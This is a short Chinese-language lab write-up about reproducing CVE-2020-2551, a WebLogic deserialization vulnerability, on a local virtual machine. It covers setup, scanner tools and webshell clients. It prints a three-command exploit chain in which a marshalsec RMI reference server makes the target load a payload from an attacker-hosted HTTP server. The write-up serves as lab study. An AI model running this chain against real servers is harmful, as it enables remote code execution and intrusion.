cve-2020-2551 weblogic的反序列化漏洞

cve-2020-2551属于weblogic的反序列化漏洞

漏洞环境

之前测试的时候是使用docker一键生成的,对搭建的过程了解的不多。这次再win10的虚拟级中搭建一次weblogic10.3.6。

简单记录
下载oracle的工具与要登录,嫌麻烦没法注册账号,就去网上找了一个公共的账号使用。
java的JDK环境不能太高使用的是1.7。刚开始使用的是1.8的发现不能启动10.3的weblogic服务。
启动服务需要输入密码,再次启动服务使用weblogic的快速启动的cmd。

漏洞利用

尝试了好几种利用方式,看了一部分文章。

首先尝试使用goby工具一键测试。没有问题。

然后使用了k8哥哥的Ladon工具一键poc与exp。就是执行命令起来有点麻烦,每次都要启动一个新的命令。gui的使用方式看了好几遍才发现怎么用的,它所有的插件都在扫描中。

过程中使用了菜刀、哥斯拉、蚁剑还有一些其他的可视化工具发现不行。说密码不对。头大。

然后使用github上提供的exp试了一下。

1
2
3
python -m SimpleHTTPServer 80
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.152.128/#exp" 1099
java -jar CVE-2020-2551.jar 192.168.152.128 7001 rmi://192.168.152.128:1099/exp

没有成功,我本地的java与靶机中的java版本不一致。

参考链接

https://xz.aliyun.com/t/7498
https://blog.csdn.net/weixin_44677409/article/details/106493733
https://blog.csdn.net/caiqiiqi/article/details/104509330?utm_medium=distribute.pc_relevant.none-task-blog-baidulandingword-2&spm=1001.2101.3001.4242